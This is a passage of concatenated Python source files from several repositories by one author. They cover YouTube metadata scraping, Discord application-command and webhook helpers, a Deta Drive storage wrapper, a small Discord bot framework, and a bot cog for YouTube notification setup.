data = pattern.findall(self.__playlist_data)
return data[0] if data else None
patterns = [rgx.name, rgx.video_count, rgx.thumbnail]
data = _Thread.run(_get_data, patterns)
return {
'name': data[0],
'video_count': data[1],
'videos': filter(rgx.video_id.findall(raw)),
'url': self.__HEAD + self.id,
'thumbnail': data[2]
}
```
#### File: src/aiotube/videobulk.py
```python
from ._http import _get_video_data
from ._threads import _Thread
from ._rgxs import _VideoPatterns as rgx
from typing import List, Optional, Dict, Any
class _VideoBulk:
def __init__(self, iterable: list):
self._video_ids = iterable
self.__source_data = self.__fetch_all
@property
def __fetch_all(self):
def fetch_bulk_source(video_id):
return _get_video_data(video_id)
return _Thread.run(fetch_bulk_source, self._video_ids)
@staticmethod
def _get_info(source: str) -> Dict[str, Any]:
"""
:return: dict containing the whole info of the video
"""
def _get_data(pattern):
data = pattern.findall(source)
return data[0] if data else None
patterns = [
rgx.title, rgx.views, rgx.likes, rgx.duration, rgx.author_id,
rgx.upload_date, rgx.thumbnail, rgx.tags, rgx.description,
rgx.is_streamed, rgx.is_premiered, rgx.video_id
]
data = _Thread.run(_get_data, patterns)
return {
'title': data[0],
'id': data[11],
'views': data[1][:-6] if data[1] else None,
'likes': data[2],
'duration': int(data[3]) / 1000 if data[3] else None,
'author': data[4],
'upload_date': data[5],
'url': f'https://www.youtube.com/watch?v={data[11]}',
'thumbnail': data[6],
'tags': data[7].split(','),
'streamed': True if data[9] else False,
'premiered': True if data[10] else False,
'description': data[8].replace('\\n', '\n') if data[8] else None,
}
def _gen_bulk(self) -> Dict[str, Dict[str, Any]]:
bulk = {}
for src in self.__source_data:
__info__ = self._get_info(src)
__id__ = __info__['id']
bulk[__id__] = __info__
return bulk
``` |
{
"source": "jnsougata/app_util",
"score": 2
} |
#### File: src/app_util/app.py
```python
import json
import discord
from .modal import Modal
from discord.utils import MISSING
from discord.http import Route
from .enums import ApplicationCommandType, PermissionType
from typing import List, Optional, Union, Dict
from typing import Optional, Any, Union, Sequence, Iterable, NamedTuple, List, Dict
class ApplicationCommandOrigin:
def __init__(self, name: str, command_type: ApplicationCommandType):
self.name = name
self.type = command_type
if self.type is ApplicationCommandType.MESSAGE:
self._qual = '__MESSAGE__' + name # name for mapping
elif self.type is ApplicationCommandType.USER:
self._qual = '__USER__' + name # name for mapping
elif self.type is ApplicationCommandType.CHAT_INPUT:
self._qual = '__CHAT__' + name
class Overwrite:
def __init__(self, data: Dict[str, Any]):
self.__data = data
@classmethod
def for_role(cls, role_id: int, *, allow: bool = True):
return cls({'id': str(role_id), 'type': PermissionType.ROLE.value, 'permission': allow})
@classmethod
def for_user(cls, user_id: int, *, allow: bool = True):
return cls({'id': str(user_id), 'type': PermissionType.USER.value, 'permission': allow})
@classmethod
def for_channel(cls, channel_id: int, *, allow: bool = True):
return cls({'id': str(channel_id), 'type': PermissionType.CHANNEL.value, 'permission': allow})
def to_dict(self) -> Dict[str, Any]:
return self.__data
# send / edit parameter handlers
def _handle_edit_params(
*,
content: Optional[str] = MISSING,
embed: Optional[discord.Embed] = MISSING,
embeds: List[discord.Embed] = MISSING,
view: Optional[discord.ui.View] = MISSING,
views: List[discord.ui.View] = MISSING,
file: Optional[discord.File] = MISSING,
files: List[discord.File] = MISSING,
allowed_mentions: Optional[discord.AllowedMentions] = MISSING,
):
payload: Dict[str, Any] = {}
if content is not MISSING:
if content is not None:
payload['content'] = str(content) # type: ignore
else:
payload['content'] = None
if embed is not MISSING:
if embed is None:
payload['embeds'] = []
else:
payload['embeds'] = [embed.to_dict()]
elif embeds is not MISSING:
if len(embeds) > 10:
raise discord.errors.InvalidArgument('A message can have at most 10 embeds.')
payload['embeds'] = [e.to_dict() for e in embeds]
if allowed_mentions is MISSING:
payload['allowed_mentions'] = None # type: ignore
else:
payload['allowed_mentions'] = allowed_mentions.to_dict()
if view is not MISSING:
if view:
payload['components'] = view.to_components()
else:
payload['components'] = []
elif views is not MISSING:
container = []
_all = [v.to_components() for v in views]
for components in _all:
container.extend(components)
payload['components'] = container
if file is not MISSING:
fs = [file]
elif files is not MISSING:
fs = files
else:
fs = []
form = []
if len(fs) == 1:
file_ = fs[0]
form.append(
{
'name': 'file', 'value': file_.fp, 'filename': file_.filename,
'content_type': 'application/octet-stream'
}
)
else:
for index, file_ in enumerate(fs):
form.append(
{
'name': f'file{index}', 'value': file_.fp, 'filename': file_.filename,
'content_type': 'application/octet-stream',
}
)
return payload, form
def _handle_send_prams(
*,
content: Optional[Union[str, Any]] = MISSING,
tts: bool = False,
ephemeral: bool = False,
file: Optional[discord.File] = None,
files: Sequence[discord.File] = None,
embed: Optional[discord.Embed] = None,
embeds: Optional[List[Optional[discord.Embed]]] = None,
allowed_mentions: Optional[discord.AllowedMentions] = None,
view: Optional[discord.ui.View] = None,
views: Optional[List[discord.ui.View]] = None,
):
if files and file:
raise TypeError('Cannot mix file and files keyword arguments.')
if embeds and embed:
raise TypeError('Cannot mix embed and embeds keyword arguments.')
if views and view:
raise TypeError('Cannot mix view and views keyword arguments.')
payload = {}
if tts:
payload['tts'] = tts
if content is not MISSING:
payload['content'] = str(content)
if embed:
payload['embeds'] = [embed.to_dict()]
elif embeds:
if len(embeds) > 10:
raise discord.errors.InvalidArgument('embeds has a maximum of 10 elements.')
payload['embeds'] = [embed.to_dict() for embed in embeds]
if allowed_mentions:
payload['allowed_mentions'] = allowed_mentions
if view:
payload['components'] = view.to_components()
elif views:
container = []
action_rows = [view.to_components() for view in views]
for row in action_rows:
container.extend(row)
payload['components'] = container
if ephemeral:
payload['flags'] = 64
if file:
fs = [file]
elif files:
fs = files
else:
fs = []
form = []
if len(fs) == 1:
file_ = fs[0]
form.append(
{
'name': 'file', 'value': file_.fp, 'filename': file_.filename,
'content_type': 'application/octet-stream',
}
)
else:
for index, file_ in enumerate(fs):
form.append(
{
'name': f'file{index}', 'value': file_.fp, 'filename': file_.filename,
'content_type': 'application/octet-stream',
}
)
return payload, form
class Adapter:
def __init__(self, interaction: discord.Interaction):
self.ia = interaction
self.id = interaction.id
self.token = interaction.token
self.client = interaction.client
self.application_id = interaction.application_id
async def original_message(self):
return await self.ia.original_message()
async def post_modal(self, *, modal: Modal):
r = Route('POST', f'/interactions/{self.id}/{self.token}/callback')
await self.client.http.request(r, json=modal.to_payload())
async def post_to_delay(self, ephemeral: bool = False):
route = Route('POST', f'/interactions/{self.id}/{self.token}/callback')
payload = {'type': 5}
if ephemeral:
payload['data'] = {'flags': 64}
await self.client.http.request(route, json=payload)
async def post_autocomplete_response(self, choices) -> None:
r = Route('POST', f'/interactions/{self.id}/{self.token}/callback')
payload = {'type': 8, 'data': {'choices': [c.data for c in choices]}}
try:
await self.client.http.request(r, json=payload)
except discord.errors.NotFound:
pass
async def post_response(
self, content:
Optional[Union[str, Any]] = MISSING,
*,
tts: bool = False,
ephemeral: bool = False,
file: Optional[discord.File] = None,
files: Sequence[discord.File] = None,
embed: Optional[discord.Embed] = None,
embeds: Optional[List[Optional[discord.Embed]]] = None,
allowed_mentions: Optional[discord.AllowedMentions] = None,
view: Optional[discord.ui.View] = None,
views: Optional[List[discord.ui.View]] = None
):
payload, form = _handle_send_prams(
content=content, tts=tts, file=file, files=files, embed=embed, embeds=embeds,
view=view, views=views, ephemeral=ephemeral, allowed_mentions=allowed_mentions)
data = {'name': 'payload_json', 'value': json.dumps({'type': 4, 'data': payload})}
form.insert(0, data) # type: ignore
r = Route('POST', f'/interactions/{self.id}/{self.token}/callback')
await self.client.http.request(r, form=form, files=files)
message = await self.original_message()
if view:
self.client._connection.store_view(view, message.id)
if views:
for view in views:
self.client._connection.store_view(view, message.id)
async def post_followup(
self,
content: Optional[Union[str, Any]] = MISSING,
*,
tts: bool = False,
ephemeral: bool = False,
embed: Optional[discord.Embed] = None,
embeds: Optional[List[discord.Embed]] = None,
allowed_mentions: Optional[discord.AllowedMentions] = None,
file: Optional[discord.File] = None,
files: Optional[List[discord.File]] = None,
view: Optional[discord.ui.View] = None,
views: Optional[List[discord.ui.View]] = None
):
payload, form = _handle_send_prams(
content=content, tts=tts, file=file, files=files, embed=embed, embeds=embeds,
view=view, views=views, ephemeral=ephemeral, allowed_mentions=allowed_mentions)
payload['wait'] = True
data = {'name': 'payload_json', 'value': json.dumps(payload)}
form.insert(0, data) # type: ignore
r = Route('POST', f'/webhooks/{self.application_id}/{self.token}')
message_data = await self.client.http.request(r, form=form, files=files)
message_id = int(message_data['id'])
if view:
self.client._connection.store_view(view, message_id)
if views:
for view in views:
self.client._connection.store_view(view, message_id)
return message_data
async def patch_response(
self,
content: Optional[Union[str, Any]] = MISSING,
*,
embed: Optional[discord.Embed] = MISSING,
embeds: Optional[List[discord.Embed]] = MISSING,
allowed_mentions: Optional[discord.AllowedMentions] = MISSING,
file: Optional[discord.File] = MISSING,
files: Optional[List[discord.File]] = MISSING,
view: Optional[discord.ui.View] = MISSING,
views: Optional[List[discord.ui.View]] = MISSING
):
payload, form = _handle_edit_params(
content=content, file=file, files=files, embed=embed,
embeds=embeds, view=view, views=views, allowed_mentions=allowed_mentions)
data = {'name': 'payload_json', 'value': json.dumps(payload)}
form.insert(0, data) # type: ignore
r = Route('PATCH', f'/webhooks/{self.application_id}/{self.token}/messages/@original')
message_data = await self.client.http.request(r, form=form, files=files)
message_id = int(message_data['id'])
if view is not MISSING and view is not None:
self.client._connection.store_view(view, message_id)
elif views is not MISSING and views is not None:
for v in views:
self.client._connection.store_view(v, message_id)
return message_data
async def delete_response(self):
r = Route('DELETE', f'/webhooks/{self.application_id}/{self.token}/messages/@original')
await self.client.http.request(r)
async def patch_followup(
self,
message_id: int,
*,
content: Optional[Union[str, Any]] = MISSING,
embed: Optional[discord.Embed] = MISSING,
embeds: Optional[List[discord.Embed]] = MISSING,
allowed_mentions: Optional[discord.AllowedMentions] = MISSING,
file: Optional[discord.File] = MISSING,
files: Optional[List[discord.File]] = MISSING,
view: Optional[discord.ui.View] = MISSING,
views: Optional[List[discord.ui.View]] = MISSING,
):
payload, form = _handle_edit_params(
content=content, file=file, files=files, embed=embed,
embeds=embeds, view=view, views=views, allowed_mentions=allowed_mentions)
payload['wait'] = True
data = {'name': 'payload_json', 'value': json.dumps(payload)}
form.insert(0, data) # type: ignore
route = Route('PATCH', f'/webhooks/{self.application_id}/{self.token}/messages/{message_id}')
message_data = await self.client.http.request(route, form=form, files=files)
if view is not MISSING and view is not None:
self._parent.client._connection.store_view(view, message_id)
elif views is not MISSING and views is not None:
for view in views:
self._parent.client._connection.store_view(view, message_id)
return message_data
async def delete_followup_message(self, message_id: int):
r = Route('DELETE', f'/webhooks/{self.application_id}/{self.token}/messages/{message_id}')
await self.client.http.request(r)
```
#### File: src/app_util/errors.py
```python
class InvalidCog(Exception):
"""
Raised when a cog is not the correct type (app_util.Cog)
"""
def __init__(self, message: str):
super().__init__(message)
class NonCoroutine(Exception):
"""
Raised when a function is not a coroutine
"""
def __init__(self, message: str):
super().__init__(message)
class CheckFailure(Exception):
"""
Raised when a before invoke check fails
"""
def __init__(self, message: str):
super().__init__(message)
class ApplicationCommandError(Exception):
"""
Raised when an application command fails to execute
"""
def __init__(self, message: str):
super().__init__(message)
class CommandNotImplemented(Exception):
"""
Raised when a command is not implemented inside source
"""
def __init__(self, message: str):
super().__init__(message)
class CommandTypeMismatched(Exception):
"""
Raised when a mismatch between two application command type is detected
"""
def __init__(self, message: str):
super().__init__(message)
``` |
{
"source": "jnsougata/BlackHole",
"score": 3
} |
#### File: src/airdrive/air.py
```python
import io
from .dcd import *
from .errors import *
from deta import Deta
from typing import Union
from binascii import unhexlify
from time import perf_counter
from urllib3 import PoolManager
class AirDrive:
def __init__(self, drive: Deta.Drive, silent: bool = False):
self.__drive = drive
self.__silent = silent
self.__http = PoolManager()
def __repr__(self):
return f"<AirDrive>"
def __log(self, prompt: str) -> None:
if not self.__silent:
print(prompt)
@classmethod
def create(cls, username: str, password: str, private_key: str = None, silent: bool = False):
"""
Create a new account
:param username: new username for the account
:param password: password for the account
:param private_key: https://deta.sh project key (optional)
:param silent: if True, prompt will be shown
:return: AirDrive object
"""
key = private_key if private_key else PK
if len(username) < 5:
raise InvalidCredentials("Use at least 5 ")
if password == PK:
raise InvalidCredentials("Don't use project key as password")
if len(password) < 8:
raise InvalidCredentials("Use at least 8 characters")
if username == password:
raise InvalidCredentials("Username and password can't be the same")
try:
drive = Deta(key).Drive(f'{username}_{password}'.replace('#', '_'))
files = drive.list().get('names')
if files:
return cls.login(username, password, private_key)
if not silent:
print(f"Account ({username}) created")
drive.put(name='.air', data=b' ')
return cls(drive=drive, silent=silent)
except AssertionError:
raise InvalidToken("Used an invalid login token")
@classmethod
def login(cls, username: str, password: str, private_key: str = None, silent: bool = False):
"""
Login to an existing account
:param username: username associated the account
:param password: password associated the account
:param private_key: https://deta.sh project key (optional)
:param silent: if True, prompt will be shown
:return: AirDrive object
"""
key = private_key if private_key else PK
try:
drive = Deta(key).Drive(f'{username}_{password}')
files = drive.list().get('names')
if files:
if not silent:
print(f"Logged in as ({username})")
print('-------')
return cls(drive=drive, silent=silent)
else:
raise AccountNotFound(f"Account ({username}) doesn't exist")
except AssertionError:
raise InvalidToken("Used an invalid login token")
def files(self) -> list:
"""
:return: list of files in the account
"""
files = self.__drive.list().get('names')
try:
files.remove('.air')
return files
except ValueError:
return files
def create_folder(self, folder_name: str) -> None:
"""
Create a new folder in the drive
:param folder_name: the name of the folder to create
:return: None
"""
path = f'{folder_name}/.air'
self.__drive.put(name=path, data=b' ')
self.__log(f"[+] Created folder ({folder_name})")
def upload(
self,
remote_file_name: str,
folder_name: str = None,
local_file_path: str = None,
file_content: Union[bytes, str, io.TextIOBase, io.BufferedIOBase, io.RawIOBase] = None
) -> None:
"""
Upload a file to the drive
:param local_file_path: path to the local file
:param remote_file_name: name with which the file will be saved on the drive
:param folder_name: folder in which the file will be saved on the drive (optional)
:param file_content: content of the file to be sent (optional)
:return: None
"""
if local_file_path:
with open(local_file_path, "rb") as f:
content = f.read()
elif file_content:
content = file_content
else:
raise InvalidFile("You must specify a (local_file_path) or (file_content). Do not mix both.")
if folder_name:
path = f'{folder_name}/{remote_file_name}'.replace('//', '/')
else:
path = remote_file_name
self.__log(f'[↑] Uploading | {path} | ...')
timer_start = perf_counter()
self.__drive.put(name=path, data=content)
timer_end = perf_counter()
elapsed = round(timer_end - timer_start)
self.__log(f"[•] Completed | {path} | {round(len(content) * 10 ** (-6), 3)} MB | {elapsed}s")
def upload_from_url(
self,
url: str,
file_name: str,
folder_name: str = None
) -> bytes:
"""
Upload a file from a URL to the drive
:param url: URL from which the file content will be downloaded
:param file_name: name with which the file will be saved on the drive
:param folder_name: folder in which the file will be saved on the drive (optional)
:return: None
"""
if folder_name:
path = f'{folder_name}/{file_name}'.replace('//', '/')
else:
path = file_name
timer_start = perf_counter()
try:
r = self.__http.request('GET', url)
except Exception:
raise InvalidURL("Either given URL is not valid or the file is not accessible")
self.__log(f'[↑] Uploading | {path} | ...')
content = r.data
self.__drive.put(name=path, data=content)
timer_end = perf_counter()
elapsed = round(timer_end - timer_start)
self.__log(f"[•] Completed | {path} | {round(len(content) * 10 ** (-6), 3)} MB | {elapsed}s")
return content
def rename(self, old_name: str, new_name: str) -> None:
"""
Rename a file on the drive
:param old_name: old name of the file
:param new_name: new name of the file to be saved
:return: None
"""
content = self.__drive.get(old_name)
if content:
self.__drive.put(name=new_name, data=content)
self.__log(f"[!] Renamed | ({old_name}) -> ({new_name})")
self.__drive.delete(old_name)
else:
raise FileNotFound(f'file ({old_name}) does not exist')
def download(self, file_name: str) -> None:
"""
Download a file from the drive
:param file_name: name/path of the file to download
:return: None
"""
resp = self.__drive.get(file_name)
if resp:
self.__log(f'[↓] Downloading | {file_name} | ...')
timer_start = perf_counter()
with open(file_name, "wb") as f:
size = 0
for chunk in resp.iter_chunks(1024):
if chunk:
size += len(chunk)
f.write(chunk)
timer_end = perf_counter()
elapsed = round(timer_end - timer_start)
self.__log(f"[•] Completed | {file_name} | {round(size * 10 ** (-6), 3)} MB | {elapsed}s")
else:
raise FileNotFound(f"file ({file_name}) does not exist")
def file_stream(self, file_name: str) -> bytes:
"""
Download a file from the drive and return its content (streamable)
:param file_name: name/path of the file to stream
:return: bytes
"""
stream = self.__drive.get(file_name)
if stream:
return stream
raise FileNotFound(f"file ({file_name}) does not exist")
def cache(self, file_name: str) -> bytes:
"""
Download a file from the drive and return its content (bytes)
:param file_name: name/path of the file to cache
:return: bytes
"""
resp = self.__drive.get(file_name)
if resp:
self.__log(f'[🗎] Caching | {file_name} | ...')
timer_start = perf_counter()
byte_list = [chunk for chunk in resp.iter_chunks(1024)]
content = b''.join(byte_list)
timer_end = perf_counter()
elapsed = round(timer_end - timer_start)
self.__log(f'[🗎] Completed | {file_name} | {round(len(content) * 10 ** (-6), 3)} MB | {elapsed}s')
return content
raise FileNotFound(f"file ({file_name}) does not exist")
def download_all(self) -> None:
"""
Download all files in the account to the current directory
:return: None
"""
for file_name in self.files():
self.download(file_name)
def delete(self, file_name: str = None, file_names: list[str] = None) -> None:
"""
Delete a file from the drive
:param file_name: file name/path to delete
:param file_names: list of file names/paths to delete
:return: None
"""
if file_name and file_name != '.air':
self.__drive.delete(file_name)
self.__log(f"[!] Deleted | ({file_name})")
if file_names:
files = [file for file in file_names if file != '.air']
try:
self.__drive.delete_many(files)
except AssertionError:
raise InvalidParameter(f"Parameter 'file_names' must be a list of non-empty strings")
self.__log(f"[!] Deleted | ({' , '.join(files)})")
else:
raise InvalidParameter(f"Parameter 'file_names' must be a list of non-empty strings")
def delete_all(self) -> None:
"""
Delete all files in the drive
:return: None
"""
files = self.files()
try:
files.remove('.air')
except ValueError:
self.__drive.put(name='.air', data=b' ')
self.__drive.delete_many(files)
self.__log("[!] Deleted all files")
def delete_account(self) -> None:
"""
Deletes the entire account
:return: None
"""
try:
self.__drive.delete_many(self.files())
except AssertionError:
raise AccountNotFound("Account having above credentials cannot be found")
``` |
{
"source": "jnsougata/discord.py",
"score": 3
} |
#### File: ext/appcommands/builder.py
```python
from typing import Any
class _Option:
data: Any
class Choice:
def __init__(self, name: str, value: Any):
self.data = {
"name": name,
"value": value
}
class StrOption(_Option):
def __init__(self, name: str, description: str, required: bool = False, choices: list[Choice] = None):
self.data = {
"name": name,
"description": description,
"type": 3,
"required": required,
"choices": [choice.data for choice in choices] if choices else []
}
class IntOption(_Option):
def __init__(self, name: str, description: str, required: bool = False, choices: list[Choice] = None):
self.data = {
"name": name,
"description": description,
"type": 4,
"required": required,
"choices": [choice.data for choice in choices] if choices else []
}
class BoolOption(_Option):
def __init__(self, name: str, description: str, required: bool = False, choices: list[Choice] = None):
self.data = {
"name": name,
"description": description,
"type": 5,
"required": required,
"choices": [choice.data for choice in choices] if choices else []
}
class UserOption(_Option):
def __init__(self, name: str, description: str, required: bool = False, choices: list[Choice] = None):
self.data = {
"name": name,
"description": description,
"type": 6,
"required": required,
"choices": [choice.data for choice in choices] if choices else []
}
class ChannelOption(_Option):
def __init__(self, name: str, description: str, required: bool = False, choices: list[Choice] = None):
self.data = {
"name": name,
"description": description,
"type": 7,
"required": required,
"choices": [choice.data for choice in choices] if choices else []
}
class RoleOption(_Option):
def __init__(self, name: str, description: str, required: bool = False, choices: list[Choice] = None):
self.data = {
"name": name,
"description": description,
"type": 8,
"required": required,
"choices": [choice.data for choice in choices] if choices else []
}
class MentionableOption(_Option):
def __init__(self, name: str, description: str, required: bool = False, choices: list[Choice] = None):
self.data = {
"name": name,
"description": description,
"type": 9,
"required": required,
"choices": [choice.data for choice in choices] if choices else []
}
class NumberOption(_Option):
def __init__(self, name: str, description: str, required: bool = False, choices: list[Choice] = None):
self.data = {
"name": name,
"description": description,
"type": 10,
"required": required,
"choices": [choice.data for choice in choices] if choices else []
}
class SlashCommand:
def __init__(self, name: str, description: str, options: list[_Option] = None):
self.name = name
self.description = description
self._payload = {
"name": name,
"description": description,
"type": 1,
"options": [option.data for option in options] if options else []
}
@staticmethod
def subcommand(name: str, description: str, options: list):
return {
"name": name,
"description": description,
"type": 1,
"options": options
}
@staticmethod
def subcommand_group(name: str, description: str, options: list):
return {
"name": name,
"description": description,
"type": 2,
"options": options
}
@staticmethod
def create_subcommand(name: str, description: str):
return {
"name": name,
"description": description,
"type": 1,
}
@staticmethod
def set_choice(name: str, value):
return {"name": name, "value": value}
@property
def to_dict(self):
return self._payload
``` |
{
"source": "jnsougata/Ditch-YouTube-API",
"score": 3
} |
#### File: Ditch-YouTube-API/src/channelbulk.py
```python
import re
from .auxiliary import _src
from ._threads import _Thread
class _ChannelBulk:
def __init__(self, iterable: list):
self._ls = iterable
@property
def ids(self):
return self._ls
@property
def urls(self):
head = 'https://www.youtube.com/channel/'
return [f'{head}{item}' for item in self._ls]
@property
def _sources(self):
head = 'https://www.youtube.com/channel/'
urls = [f'{head}{item}/about' for item in self._ls]
def get_page(url):
return _src(url)
return _Thread.run(get_page, urls)
@property
def names(self):
pattern = r"channelMetadataRenderer\":{\"title\":\"(.*?)\""
return [re.findall(pattern, item)[0] for item in self._sources]
@property
def subscribers(self):
pattern = r"}},\"simpleText\":\"(.*?) "
temp = [re.findall(pattern, item) for item in self._sources]
return [item[0] if item else None for item in temp]
@property
def views(self):
pattern = r"viewCountText\":{\"simpleText\":\"(.*?)\""
temp = [re.findall(pattern, item) for item in self._sources]
return [item[0][:-6] if item else None for item in temp]
@property
def joined(self):
pattern = r"text\":\"Joined \"},{\"text\":\"(.*?)\""
temp = [re.findall(pattern, item) for item in self._sources]
return [item[0] if item else None for item in temp]
@property
def countries(self):
pattern = r"country\":{\"simpleText\":\"(.*?)\""
temp = [re.findall(pattern, item) for item in self._sources]
return [item[0] if item else None for item in temp]
@property
def custom_urls(self):
pattern = r"canonicalChannelUrl\":\"(.*?)\""
temp = [re.findall(pattern, item) for item in self._sources]
return [item[0] if '/channel' not in item[0] else None for item in temp]
@property
def descriptions(self):
pattern = r"description\":{\"simpleText\":\"(.*?)\""
temp = [re.findall(pattern, item) for item in self._sources]
return [item[0].replace('\\n', ' ') if item else None for item in temp]
@property
def avatars(self):
pattern = "height\":88},{\"url\":\"(.*?)\""
temp = [re.findall(pattern, item) for item in self._sources]
return [item[0] if item else None for item in temp]
@property
def banners(self):
pattern = r"width\":1280,\"height\":351},{\"url\":\"(.*?)\""
temp = [re.findall(pattern, item) for item in self._sources]
return [item[0] if item else None for item in temp]
@property
def verifieds(self):
pattern = 'label":"Verified'
return [True if re.search(pattern, item) else False for item in self._sources]
@property
def lives(self):
pattern = r'{"text":" watching"}'
return [True if re.search(pattern, item) else False for item in self._sources]
``` |
{
"source": "jnsougata/Ezcord",
"score": 2
} |
#### File: src/ezcord/bot.py
```python
import os
import asyncio
import aiohttp
from .user import User
from .cprint import Log
from .slash import Slash
from .guild import Guild
from functools import wraps
from .channel import Channel
from .socket import WebSocket
class Bot(WebSocket):
def __init__(
self,
prefix: str,
intents: int,
app_id: int = None,
guild_id: int = None,
):
self._events = {}
self._cmd_pool = {}
self._slash_queue = []
self._app_id = app_id
self.prefix = prefix
self._secret = ''
self.intents = intents
self.guild_id = guild_id
super().__init__(
app_id=app_id,
prefix=prefix,
intents=intents,
guild_id=guild_id,
events=self._events,
token=self._secret,
commands=self._cmd_pool,
slash_queue=self._slash_queue,
)
@property
def guilds(self):
return len(self._guilds)
@property
def channels(self):
return len(self._channels)
def slash_command(self, command: Slash):
self._slash_queue.append(command.json)
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
return func
self._cmd_pool[command.json["name"]] = wrapper()
return decorator
def command(self, name: str):
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
return func
self._cmd_pool[name] = wrapper()
return decorator
def event(self, fn):
self._events[fn.__name__] = fn
def run(self, token: str):
self._secret = token
loop = asyncio.new_event_loop()
try:
loop.run_until_complete(self._connect())
except KeyboardInterrupt:
Log.purple('[!] --------------------------')
Log.red(f'[🔌] 🖿 ━━━━━━━━━ x ━━━━━━━━━ 🌐')
os._exit(0)
```
#### File: src/ezcord/context.py
```python
import json
from .embed import Embed
from .guild import Guild
from .member import Member
from .message import Message
from .channel import Channel
from aiohttp import ClientSession
class Context:
def __init__(self, _object: dict, _cached: dict):
self._object = _object
self._cached = _cached
self._secret = _object.get('_token')
self._session = _object.get('session')
self._guild_id = _object.get('guild_id')
self._channel_id = _object.get('channel_id')
self._author_id = _object.get('author').get('id')
self._head = 'https://discord.com/api/v9'
@property
def message(self):
return Message(self._object)
@property
def author(self):
return self.guild.get_member(int(self._author_id))
@property
def guild(self):
return Guild(self._cached['guilds'][self._guild_id])
async def send(self, content: str = None, embed: Embed = None, embeds: [Embed] = None):
if embeds:
payload = [embed.dict() for embed in embeds]
elif embed:
payload = [embed.dict()]
else:
payload = []
resp = await self._session.post(
f'{self._head}/channels/{self._channel_id}/messages',
json={
'content': str(content),
'tts': False,
'embeds': payload,
'components': [],
'sticker_ids': [],
'attachments': [],
},
headers={
"Authorization": f"Bot {self._secret}",
"Content-Type": 'application/json'
}
)
return await resp.json()
async def reply(self, content: str = None, embed: Embed = None, embeds: [Embed] = None):
if embeds:
payload = [embed.dict() for embed in embeds]
elif embed:
payload = [embed.dict()]
else:
payload = []
resp = await self._session.post(
f'{self._head}/channels/{self._channel_id}/messages',
json={
'content': str(content),
'tts': False,
'embeds': payload,
'components': [],
'sticker_ids': [],
'attachments': [],
'message_reference': {
'message_id': self.message.id,
'channel_id': self._channel_id,
'guild_id': self.guild.id,
'fail_if_not_exists': False
}
},
headers={
"Authorization": f"Bot {self._secret}",
"Content-Type": 'application/json'
}
)
return await resp.json()
```
#### File: src/ezcord/embed.py
```python
from datetime import datetime
class Embed:
def __init__(self, title: str = None, description: str = None, url: str = None, color: int = None):
self._init = {
'type': 'rich',
'title': title,
'description': description,
'url': url,
'color': color,
'fields': [],
}
def dict(self):
return self._init
def add_field(self, name: str, value: str, inline: bool = False):
self._init['fields'].append({'name': name, 'value': value, 'inline': inline})
def set_footer(self, text: str, icon_url: str = None, proxy_icon_url: str = None):
self._init['footer'] = {'text': text, 'icon_url': icon_url, 'proxy_icon_url': proxy_icon_url}
def set_thumbnail(self, url: str, height: int = None, width: int = None, proxy_url: str = None):
self._init['thumbnail'] = {'url': url, 'height': height, 'width': width, 'proxy_url': proxy_url}
def add_image(self, url: str, height: int = None, width: int = None, proxy_url: str = None):
self._init['image'] = {'url': url, 'height': height, 'width': width, 'proxy_url': proxy_url}
def set_author(self, name: str, url: str = None, icon_url: str = None, proxy_icon_url: str = None):
self._init['author'] = {'name': name, 'url': url, 'icon_url': icon_url, 'proxy_icon_url': proxy_icon_url}
def set_timestamp(self):
self._init['timestamp'] = datetime.utcnow().isoformat()
```
#### File: src/ezcord/role.py
```python
class Role:
def __init__(self, payload: dict):
self._data = payload
def __repr__(self):
return f'<Role ({self.name} | {self.id})>'
@property
def mention(self):
return f'<@&{self.id}>'
@property
def name(self):
return self._data.get('name')
@property
def id(self):
return self._data.get('id')
@property
def color(self):
return self._data.get('color')
@property
def hoisted(self):
return self._data.get('hoist')
@property
def managed(self):
return self._data.get('managed')
@property
def mentionable(self):
return self._data.get('mentionable')
@property
def permissions(self):
return self._data.get("permissions")
@property
def position(self):
return self._data.get('position')
@property
def bot_id(self):
tags = self._data.get('tags')
if tags:
return tags.get('bot_id')
@property
def integration_id(self):
tags = self._data.get('tags')
if tags:
return tags.get('integration_id')
@property
def booster(self):
tags = self._data.get('tags')
if tags:
return tags.get('premium_subscriber')
@property
def emoji(self):
return self._data.get('unicode_emoji')
@property
def icon(self): #convert asset
return self._data.get('icon')
``` |
{
"source": "jnsougata/PixeL",
"score": 3
} |
#### File: bot/cogs/setup_all.py
```python
import discord
import extlib
from bot.extras.emojis import Emo
from bot.views.custom_view import sub_view_msg
from bot.views.youtube_view import sub_view_youtube
from bot.views.welcomer_view import sub_view_welcomer
from bot.views.pingrole_view import sub_view_pingrole
class Setup(extlib.cog):
def __init__(self, bot: extlib.Bot):
self.bot = bot
@extlib.cog.command(
name='setup',
description='setup the server configurations',
dm_access=False,
category=extlib.CommandType.SLASH
)
@extlib.cog.default_permission(discord.Permissions.manage_guild)
async def setup_command(self, ctx: extlib.Context):
pass
@setup_command.subcommand(
name='youtube',
description='integrates youtube channel to the server',
options=[
extlib.StrOption(
name='channel',
description='url or id of the youtube channel',
required=True),
extlib.ChannelOption(
name='receiver',
description='text channel to receive notifications',
channel_types=[extlib.ChannelType.GUILD_TEXT, extlib.ChannelType.GUILD_NEWS],
required=True),
]
)
async def youtube_command(self, ctx: extlib.Context, channel: str, receiver: discord.TextChannel):
await ctx.defer()
await sub_view_youtube(self.bot, ctx, channel, receiver)
@setup_command.subcommand(
name='welcomer',
description='adds welcome card to the server',
options=[
extlib.ChannelOption(
name='channel',
description='text channel to greet with welcome cards',
channel_types=[extlib.ChannelType.GUILD_TEXT, extlib.ChannelType.GUILD_NEWS],
required=True
),
extlib.AttachmentOption(
name='image',
description='image file to send when new member joins',
required=False
),
]
)
async def welcomer_command(self, ctx: extlib.Context, channel: discord.TextChannel, image: discord.Attachment):
await ctx.defer()
await sub_view_welcomer(self.bot, ctx, image, channel)
@setup_command.subcommand(
name='ping_role',
description='adds role to ping with youtube notification',
options=[
extlib.RoleOption(
name='role', description='role to ping with youtube notification', required=True),
]
)
async def ping_role_command(self, ctx: extlib.Context, role: discord.Role):
await ctx.defer()
await sub_view_pingrole(self.bot, ctx, role)
@setup_command.subcommand(
name='custom_message',
description='adds custom welcome and notification message',
options=[
extlib.IntOption(
name='option',
description='type of message to add or edit',
choices=[
extlib.Choice(name='upload', value=1),
extlib.Choice(name='welcome', value=0),
extlib.Choice(name='livestream', value=2),
],
required=True),
]
)
